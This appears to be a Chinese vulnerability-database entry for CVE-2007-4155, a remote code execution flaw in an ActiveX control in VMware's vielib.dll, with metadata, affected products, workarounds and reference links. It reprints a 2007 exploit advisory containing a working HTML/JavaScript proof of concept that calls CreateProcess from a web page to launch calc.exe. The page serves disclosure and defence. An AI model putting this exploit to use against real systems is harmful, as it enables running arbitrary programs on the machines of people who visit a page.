VMware Workstation 'vielib.dll'目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1113403 漏洞类型 设计错误
发布时间 2007-07-30 更新时间 2007-11-01
CVE编号 CVE-2007-4155 CNNVD-ID CNNVD-200708-024
漏洞平台 Windows CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/4245
https://www.securityfocus.com/bid/25131
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200708-024
|漏洞详情
VMWare是一款虚拟PC软件,允许在一台机器上同时运行两个或多个Windows、DOS、LINUX系统。EMCVmware6.0.0的vielib.dll中的某些ActiveX控件存在绝对路径遍历漏洞,远程攻击者可以通过CreateProcess或者CreateProcessExmethod两个参数的绝对路径名执行任意程序。
|漏洞EXP
:. GOODFELLAS Security Research TEAM  .:
:. http://goodfellas.shellcode.com.ar .:

VmWare Inc version 6.0.0 CreateProcess & CreateProcessEx Remode Code Execution Exploit
======================================================================================

Internal ID: VULWAR200707300.
-----------

Introduction
------------
vielib.dll is a library included in the Program Vmware Version 6.0.0 from Vmware Inc. Company.


Tested In
---------
- Windows XP SP1/SP2 french/english with IE 6.0 / 7.0.


Summary
-------
The CreateProcess & CreateProcessEx method doesn't check if they're being called
from the application, or malicious users. Remote Attacker could craft a html page
and execute code in a remote system with the actual user privileges.


Impact
------
Any computer that uses this Sofware will be exposed to Remote Execution Code.


Workaround
----------
- Activate the Kill bit zero in clsid:0F748FDE-0597-443C-8596-71854C5EA20A
- Unregister vielib.dll using regsvr32.


Timeline
--------
July 30 2007 -- Bug Discovery.
July 30 2007 -- Exploit published.


Credits
-------
 * callAX <callAX@shellcode.com.ar>
 * GoodFellas Security Research Team  <goodfellas.shellcode.com.ar>
 

Technical Details
-----------------


<HTML>
<BODY>
  <object id=_9090909090 classid="clsid:{0F748FDE-0597-443C-8596-71854C5EA20A}"></object>
<SCRIPT>

function _d0_() {
 
 ba="c:\\windows\\system32\\calc.exe"
 ad="c:\\windows\\system32\\calc.exe"
 fO="c:\\windows\\system32\\"
 Od=1

_9090909090.CreateProcess(ba, ad, fO, Od)
 }

</SCRIPT>
<input language=JavaScript onclick=_d0_() type=button value="Proof of Concept">
</BODY>
</HTML>

# milw0rm.com [2007-07-30]
|受影响的产品
VMWare Workstation 6.0 VMWare Workstation 5.5.4 VMWare Workstation 5.5 VMWare Server 1.0.3 VMWare Player 2.0 VMWare Player 1.0.4 VMWare ACE 2.0
|参考资料

来源:XF
名称:vmware-createprocess-code-execution(35670)
链接:http://xforce.iss.net/xforce/xfdb/35670
来源:BID
名称:25131
链接:http://www.securityfocus.com/bid/25131
来源:MILW0RM
名称:4245
链接:http://www.milw0rm.com/exploits/4245
来源:www.vmware.com
链接:http://www.vmware.com/support/ws6/doc/releasenotes_ws6.html
来源:www.vmware.com
链接:http://www.vmware.com/support/ws55/doc/releasenotes_ws55.html
来源:www.vmware.com
链接:http://www.vmware.com/support/server/doc/releasenotes_server.html
来源:www.vmware.com
链接:http://www.vmware.com/support/player2/doc/releasenotes_player2.html
来源:www.vmware.com
链接:http://www.vmware.com/support/player/doc/releasenotes_player.html
来源:www.vmware.com
链接:http://www.vmware.com/support/ace2/doc/releasenotes_ace2.html
来源:www.vmware.com
链接:http://www.vmware.com/support/ace/doc/releasenotes_ace.html
来源:SECTRACK
名称:1018511
链接:http://www.securitytracker.com/id?1018511
来源:VUPEN
名称:ADV-2007-3229
链接:http://www.frsirt.com/english/advisories/2007/3229
来源:SECUNIA
名称:26890
链接:http://secunia.com/adviso